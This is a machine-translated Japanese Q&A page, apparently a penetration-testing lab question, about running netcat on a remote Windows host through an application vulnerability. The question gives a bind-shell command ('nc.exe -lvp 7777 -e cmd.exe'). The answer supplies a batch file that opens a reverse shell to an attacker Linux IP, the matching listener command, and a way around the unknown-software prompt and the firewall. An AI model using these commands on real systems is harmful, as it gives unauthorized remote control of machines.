web-dev-qa-db-ja.com

exeではなくbatファイルとしてNetCatを実行する

リモートのラボマシンでnetcatを実行する必要があります。 (アプリケーションの脆弱性のため)管理者権限でブラウザを介してリモートコマンドを実行できますが、マシン自体にアクセスできません。

アップロードしたnc.exeリモートサーバー上で動作しますが、機能しません。おそらくWindowsが不明なソフトウェアを実行してもよいかどうかを尋ねているためですが、[許可]をクリックするユーザーがいません。

だから私はexe2batソフトウェアですが、変換時に何か問題があったと思います。

私のために機能するはずのこのコマンド:nc.exe -lvp 7777 -e cmd.exe
変換: exe2bat nc.exe nc.bat
実行:nc.bat -lvp 7777 -e cmd.exe

なぜそれが私にとってうまくいかないのか、私が何を間違っているのか、または他のより良いexeからbatへのコンバータがあるかどうかアドバイスできますか?

penetration-testbackdoorremote-server
3
Dranik

「不明なソフトウェア」のセキュリティ警告を回避するには、nc.exenc2.batをアップロードする必要がありました。
nc2.bat内部から接続を開始し、ファイアウォールのセキュリティを回避するためのコンテンツプロンプト:

@echo on
c:\%path_to_nc%\nc -nv %LINUX_IP% 4466 -e cmd

  1. 次に、Linux IPにリスナーを設定します

    nc -nlvp 4466

  2. nc2を呼び出すリモートコマンドを実行する

この方法で、Windowsボックスからコマンドプロンプトをすぐに取得しました。

2
Dranik